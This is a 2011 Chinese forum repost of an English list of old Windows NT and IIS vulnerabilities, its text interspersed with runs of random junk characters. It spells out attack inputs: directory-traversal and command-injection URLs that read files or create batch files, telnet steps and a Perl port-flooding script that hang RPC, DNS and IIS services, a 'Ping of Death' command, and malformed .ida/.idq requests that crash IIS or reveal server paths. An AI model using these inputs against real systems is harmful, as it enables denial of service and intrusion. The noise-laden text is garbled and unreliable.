標(biāo)題: NT的漏洞及描述(英文) [打印本頁] 作者: 雜七雜八 時(shí)間: 2011-1-13 17:12 標(biāo)題: NT的漏洞及描述(英文) 受影響系統(tǒng):4.0,iis 1.06 N V9 x( @1 m @
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory." f$ ]' W, s9 ^" h; R+ ?. N
* t9 L; a7 x5 U, ]A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.$ Y! y' i7 v2 [/ C* z; E6 t
/ K l h7 c |1 ?/ lBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.; V1 n1 o4 N* b9 y( b; g
. @; s+ I$ W; e: G! j, b4 e
-------------------------------------------------------------------- . e5 o5 ^& |# ^3 i: r: q' ]9 S! A u+ K% Z& Z% T# h' o受影響系統(tǒng):4.0! J( [0 n: ~% N1 F6 c* x0 P
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''. ' @7 ~* Q! }* y. n& M8 s! r# t; a/ C# v* G) M t6 P' }8 @! F0 a
If the file 'target.bat' exists, the file will be truncated. 6 z& a( M! s, }4 Q6 B" C3 l* d 6 @; S+ J/ [4 l- K+ x# A0 c4 d; s& H/ |; T. L O' z1 p
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.: u9 q0 D+ ]) l" ~7 Y! Y- ^9 D8 l2 b1 w
# ? u+ y% M0 d7 C% I4 w& x---------------------------------------------------------------------- % r) \$ [# K4 Z" ?2 ]- F: y5 W( p9 C9 N( n% N
受影響系統(tǒng):3.51,4.0 $ C8 T" |, M% Z. T6 ~Multiple service ports (53, 135, 1031) are vunerable to 'confusion'. # e9 w+ y: e6 d! {3 q : J. n6 l! i5 Z% ]- iThe following steps;9 C8 O& [% R% B" D. ]+ ]
& C, |8 Z9 K" b2 }7 O; k6 ITelnet to an NT 4.0 system on port 135 " d+ b4 ~1 h9 E
Type about 10 characters followed by a <CR> * z% G% u2 @6 F5 P6 A3 ?Exit Telnet + N9 \1 x6 ]/ ]/ u$ zresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system. , F1 j7 | S4 x& m& P* B9 g4 b8 p% Z4 P+ a/ c( o
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.1 t3 A- }+ o) a+ @* O7 _/ g- d
8 l$ a9 _$ p# J% D
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted. " w* p5 v+ B' V0 }9 q% ^8 B2 L3 R: |; p; Q. U3 K; E
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning. ' D$ |4 k6 ]( T4 {/ J6 H& f 7 z& o) k. K: L. gThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit): ; T1 e9 L! l( ` 1 i; E# W* V: v" V9 O; d/*begin poke code*/7 {) i8 g& f" j" g
! _8 a/ L* q( r+ G7 E
use Socket; : O5 Y! T \" ^; w2 W. B2 |$ k Tuse FileHandle; , b5 P" ~# ?; C! ]2 w# P! s2 xrequire "chat2.pl"; % F; |; |1 f! B! M# q! X$ w# N . O8 u6 I. p; A2 k- v5 W$systemname = $ARGV[0] && shift;: S1 h& |; O5 g Z( L8 Q6 j
1 b, @$ Y: b5 L8 E& P& \
$verbose = 1; # tell me what you're hitting0 S }0 w5 k% C; K! R$ o: m. V; M" U
$knownports = 1; # don't hit known problem ports 2 y- h% Q# p( E$ ]. H1 u6 Pfor ($port = $0; $port<65535; $port++) 4 @' I7 _' @# p g1 l# R# K
{) l+ _: ]- A# v+ m# w+ k
$ E& ~" C* e; Z5 i+ m! e4 _: y; i' @
$ L( s8 J! v, J- G; X# P+ [
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) { J& W6 E) c; Y* S! r! c( I
next;9 q+ A) a0 c+ t/ x9 o
} & d' M, I# R" c( x0 {" n. h$fh = chat::open_port($systemname, $port); 5 q; l, l/ x$ e& M. @ hchat::print ($fh,"This is about ten characters or more");8 _9 J4 F! ?9 l0 [
if ($verbose) {: N) c- m5 N' r4 L
print "Trying port: $port\n";: j) T3 }6 k, n5 G; G9 o8 B
} / G, k* h! D% ]1 r' A. w
chat::close($fh); % b3 ]! ?- P( j9 F/ h 9 N/ k+ P1 ^9 H) X6 |: A} 5 q( j9 i* a0 p/ T# P: M8 f+ C- ` $ q' z' v9 e" {6 h' |6 h % z* m) {3 o. d; l- \- h9 \, \3 {/*end poke code*/ 0 m* B$ [: @& q ) w* q$ ^' t' X. k: LSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername 5 u$ P: `+ f1 K4 e, c4 K# A' @0 w$ a8 l5 i7 P* U
-------------------------------------------------------------------------------- 2 V A8 g8 _6 i3 J- U5 K& b' c; _# m
受影響系統(tǒng):4.0 9 C6 P2 `: J) N8 ^Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.; `+ L4 x* P0 z8 o% _; w i( m
: o/ s1 B1 _/ ^+ m% g! h; LThis attack causes Dr. Watson to display an alert window and to log an error: 7 E- S7 Y: T5 C `- o6 }( x/ T3 D" C
& F" X5 s4 r) H2 t"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"3 a9 ^6 w" F7 G
3 x# {4 i4 n6 b, ]& {
--------------------------------------------------------------------------------- b" s. G- U2 e6 M7 C+ W" I# Y5 g# q
- X+ f! h9 z9 ]( b/ G
受影響系統(tǒng):3.51,4.08 X: T8 Z# }0 R
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:$ h$ E2 \! p/ ?. G: _- N- C% l
2 k* G9 b( u1 S/ \, O L. M
STOP: 0X0000001E) O; X7 {$ R3 k* n
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS$ @ r3 r7 v! P. ~ T( A! {+ G
: a8 e& i) o, o- Y( T-OR- 0 u1 [2 P* N& \1 O8 \- n s* [ L) N1 J X- U0 l" z/ `STOP: 0x0000000A2 T" U6 G. ]9 i# l( V% P
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS 4 Y( G# J7 n7 ~1 o; Z( R ' o" q; A% m4 O: r& E, eNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.8 W1 q( R& V* _" n# T
" D5 ~( R) l+ l0 F3 p2 |" b-------------------------------------------------------------------------------- " k; W* Z( T T. o/ e' c- p' j9 x& P4 B9 Z* y9 W. b
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). & C$ i+ K% S' q f0 ^1 R
8 [3 h2 D1 S+ L' B% \5 L2 x9 G
-------------------------------------------------------- 5 o) Y3 s7 e- k" S # [( |8 d+ j* RIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server